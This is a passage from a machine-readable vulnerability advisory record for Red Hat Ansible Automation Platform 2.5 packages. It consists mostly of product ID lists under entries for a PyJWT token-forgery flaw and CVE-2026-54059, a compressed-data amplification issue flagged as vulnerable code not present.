"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pyjwt: PyJWT: Authentication bypass due to forged JSON Web Tokens"
},
{
"cve": "CVE-2026-54059",
"cwe": {
"id": "CWE-409",
"name": "Improper Handling of Highly Compressed Data (Data Amplification)"
},
"discovery_date": "2026-07-06T20:02:21.640821+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2497464"
}
],
"notes": [
{
"category": "description",
